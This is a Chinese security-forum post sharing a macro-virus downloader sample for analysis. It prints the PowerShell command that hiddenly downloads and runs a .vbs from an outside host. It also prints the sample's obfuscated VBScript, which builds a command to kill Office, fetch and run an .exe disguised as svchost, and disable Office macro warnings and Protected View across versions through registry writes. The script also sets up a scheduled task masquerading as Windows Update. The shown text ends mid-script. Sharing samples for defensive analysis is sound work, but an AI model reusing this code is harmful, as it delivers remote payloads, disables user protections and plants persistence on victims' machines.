收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 一个宏病毒downloader
12下一页
返回列表 发新帖
查看: 3090|回复: 14
收起左侧

[病毒样本] 一个宏病毒downloader

[复制链接]
remiliacn
发表于 2018-2-10 05:21:44 | 显示全部楼层 |阅读模式
本帖最后由 remiliacn 于 2018-2-10 11:31 编辑

主程序在这里!



解压密码:infected

执行命令:
  1. cmd.exe /c powershell -W Hidden (New-Object System.NeT.WeBClieNT).DownloadFile('http://fast-cargo.com/images/file/vb/38.vbs','%Public%\\svchost32.vbs');Start-Process '%Public%\\svchost32.vbs'
复制代码

  1. Set shhh = CreateObject("WScript.Shell")
  2.    Dim AnwiuWEnhiu3niasmdW1
  3.    Dim AnwiuWEnhiu3niasmdW2
  4.    Dim AnwiuWEnhiu3niasmdW3
  5.    Dim AnwiuWEnhiu3niasmdW4
  6.    Dim AnwiuWEnhiu3niasmdW5
  7.    Dim AnwiuWEnhiu3niasmdW6
  8.    Dim AnwiuWEnhiu3niasmdW7
  9.    Dim AnwiuWEnhiu3niasmdW8
  10.    Dim AnwiuWEnhiu3niasmdW9
  11.    Dim AnwiuWEnhiu3niasmdW010
  12.    Dim AnwiuWEnhiu3niasmdW011
  13.    
  14.     AnwiuWEnhiu3niasmdW1 = "c"
  15.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "m"
  16.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "d"
  17.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "."
  18.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "e"
  19.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "x"
  20.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "e "
  21.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
  22.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "K "
  23.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "t"
  24.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "a"
  25.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "s"
  26.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "k"
  27.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "k"
  28.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
  29.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "l"
  30.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "l "
  31.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
  32.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "f "
  33.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "/"
  34.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
  35.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "m "
  36.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "w"
  37.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "i"
  38.     AnwiuWEnhiu3niasmdW1 = AnwiuWEnhiu3niasmdW1 & "n"
  39.     AnwiuWEnhiu3niasmdW2 = "w"
  40.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "o"
  41.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "r"
  42.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "d"
  43.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "."
  44.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "e"
  45.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "x"
  46.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "e"
  47.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "&"
  48.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "t"
  49.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "a"
  50.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "s"
  51.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "k"
  52.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "k"
  53.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "i"
  54.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "l"
  55.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "l "
  56.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "/"
  57.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "f "
  58.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "/"
  59.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "i"
  60.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "m "
  61.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "E"
  62.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "x"
  63.     AnwiuWEnhiu3niasmdW2 = AnwiuWEnhiu3niasmdW2 & "c"
  64.     AnwiuWEnhiu3niasmdW3 = "e"
  65.     AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "l"
  66.     AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "."
  67.     AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "e"
  68.     AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "x"
  69.     AnwiuWEnhiu3niasmdW3 = AnwiuWEnhiu3niasmdW3 & "e"
  70.     AnwiuWEnhiu3niasmdW4 = "&"
  71.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "P"
  72.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "o"
  73.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "w"
  74.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "e"
  75.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "r"
  76.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "S"
  77.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "h"
  78.     AnwiuWEnhiu3niasmdW4 = AnwiuWEnhiu3niasmdW4 & "e"
  79.     AnwiuWEnhiu3niasmdW5 = "l"
  80.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "l "
  81.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "("
  82.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "N"
  83.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
  84.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "w"
  85.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "-"
  86.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "O"
  87.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "b"
  88.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "j"
  89.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
  90.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "c"
  91.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "t "
  92.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "S"
  93.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "y"
  94.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "s"
  95.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "t"
  96.     AnwiuWEnhiu3niasmdW5 = AnwiuWEnhiu3niasmdW5 & "e"
  97.     AnwiuWEnhiu3niasmdW6 = "m"
  98.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
  99.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "N"
  100.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
  101.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "t"
  102.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
  103.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "W"
  104.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
  105.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "b"
  106.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "C"
  107.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "l"
  108.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "i"
  109.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "e"
  110.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "n"
  111.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "t"
  112.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & ")"
  113.     AnwiuWEnhiu3niasmdW6 = AnwiuWEnhiu3niasmdW6 & "."
  114.     AnwiuWEnhiu3niasmdW7 = "D"
  115.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "o"
  116.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "w"
  117.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "n"
  118.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "l"
  119.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "o"
  120.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "a"
  121.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "d"
  122.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "F"
  123.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "i"
  124.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "l"
  125.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "e"
  126.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "("
  127.     AnwiuWEnhiu3niasmdW7 = AnwiuWEnhiu3niasmdW7 & "'http://fast-cargo.com/images/file/vb/exe/38.exe'"
  128.     AnwiuWEnhiu3niasmdW8 = ","
  129.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "'"
  130.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "%"
  131.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "P"
  132.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "u"
  133.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "b"
  134.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "l"
  135.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "i"
  136.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "c"
  137.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "%"
  138.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & ""
  139.     AnwiuWEnhiu3niasmdW8 = AnwiuWEnhiu3niasmdW8 & "s"
  140.     AnwiuWEnhiu3niasmdW9 = "v"
  141.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "c"
  142.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "h"
  143.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "o"
  144.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "s"
  145.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
  146.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "."
  147.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "e"
  148.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "x"
  149.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "e"
  150.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "'"
  151.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & ")"
  152.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & ";"
  153.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "S"
  154.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
  155.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "a"
  156.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "r"
  157.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "t"
  158.     AnwiuWEnhiu3niasmdW9 = AnwiuWEnhiu3niasmdW9 & "-"
  159.     AnwiuWEnhiu3niasmdW010 = "P"
  160.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "r"
  161.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "o"
  162.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "c"
  163.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "e"
  164.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "s"
  165.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "s "
  166.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "'"
  167.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "%"
  168.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "P"
  169.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "u"
  170.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "b"
  171.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "l"
  172.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "i"
  173.     AnwiuWEnhiu3niasmdW010 = AnwiuWEnhiu3niasmdW010 & "c"
  174.     AnwiuWEnhiu3niasmdW011 = "%"
  175.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & ""
  176.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "s"
  177.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "v"
  178.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "c"
  179.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "h"
  180.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "o"
  181.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "s"
  182.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "t"
  183.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "."
  184.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "e"
  185.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "x"
  186.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "e"
  187.     AnwiuWEnhiu3niasmdW011 = AnwiuWEnhiu3niasmdW011 & "'"
  188.     AnwiuWEnhiu3niasmdW12 = AnwiuWEnhiu3niasmdW1 + AnwiuWEnhiu3niasmdW2 + AnwiuWEnhiu3niasmdW3 + AnwiuWEnhiu3niasmdW4 + AnwiuWEnhiu3niasmdW5 + AnwiuWEnhiu3niasmdW6 + AnwiuWEnhiu3niasmdW7 + AnwiuWEnhiu3niasmdW8 + AnwiuWEnhiu3niasmdW9 + AnwiuWEnhiu3niasmdW010 + AnwiuWEnhiu3niasmdW011
  189.     shhh.Run AnwiuWEnhiu3niasmdW12, vbHide
  190. Set wso = CreateObject("WScript.Shell")
  191. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  192. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  193. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  194. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  195. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\VBAWarnings", 1, "REG_DWORD"
  196. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  197. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  198. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  199. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  200. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\VBAWarnings", 1, "REG_DWORD"
  201. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  202. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  203. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  204. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  205. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\VBAWarnings", 1, "REG_DWORD"
  206. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  207. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  208. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  209. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  210. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  211. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  212. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  213. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  214. wso.RegWrite "HKCU\Software\Microsoft\Office\11.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  215. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  216. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  217. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  218. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  219. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  220. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  221. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  222. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  223. wso.RegWrite "HKCU\Software\Microsoft\Office\12.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  224. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  225. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  226. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  227. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  228. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  229. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  230. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  231. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  232. wso.RegWrite "HKCU\Software\Microsoft\Office\14.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  233. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  234. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  235. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  236. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  237. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  238. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  239. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  240. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  241. wso.RegWrite "HKCU\Software\Microsoft\Office\15.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  242. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  243. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  244. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Word\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  245. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  246. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  247. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\PowerPoint\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"
  248. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableInternetFilesInPV", 1, "REG_DWORD"
  249. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableAttachementsInPV", 1, "REG_DWORD"
  250. wso.RegWrite "HKCU\Software\Microsoft\Office\16.0\Excel\Security\ProtectedView\DisableUnsafeLocationsInPV", 1, "REG_DWORD"

  252. set shhh = CreateObject("WScript.Shell")
  253.    Dim AnwiuWEnhiu3niasmdWtime
  254.     AnwiuWEnhiu3niasmdWtime = "SchTasks /Create /sc MINUTE /MO 200 /TN WindowsUpdates /TR C:\\Users\\Public\\svchost32.vbs"

  256. shhh.run AnwiuWEnhiu3niasmdWtime, vbHide


  259. set shhh = CreateObject("WScript.Shell")
  260.    Dim DLOTO
  261.     DLOTO = "schtasks /delete /tn WindowsUpdate /F"

  263. shhh.run DLOTO, vbHide


  266. Set shhh = CreateObject("WScript.Shell")
  267.    Dim ASnWnQ2Q87WmxW291DXnw4
  268.    Dim ASnWnQ2Q87WmxW291DXnw5
  269.    Dim ASnWnQ2Q87WmxW291DXnw6
  270.    Dim ASnWnQ2Q87WmxW291DXnw7
  271.    Dim ASnWnQ2Q87WmxW291DXnw8
  272.    Dim ASnWnQ2Q87WmxW291DXnw9
  273.    Dim ASnWnQ2Q87WmxW291DXnw010
  274.    Dim ASnWnQ2Q87WmxW291DXnw011
  275.    
  276.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "P"
  277.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "o"
  278.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "w"
  279.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "e"
  280.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "r"
  281.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "S"
  282.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "h"
  283.     ASnWnQ2Q87WmxW291DXnw4 = ASnWnQ2Q87WmxW291DXnw4 & "e"
  284.     ASnWnQ2Q87WmxW291DXnw5 = "l"
  285.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "l "
  286.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "("
  287.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "N"
  288.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
  289.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "w"
  290.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "-"
  291.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "O"
  292.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "b"
  293.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "j"
  294.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "e"
  295.     ASnWnQ2Q87WmxW291DXnw5 = ASnWnQ2Q87WmxW291DXnw5 & "c"
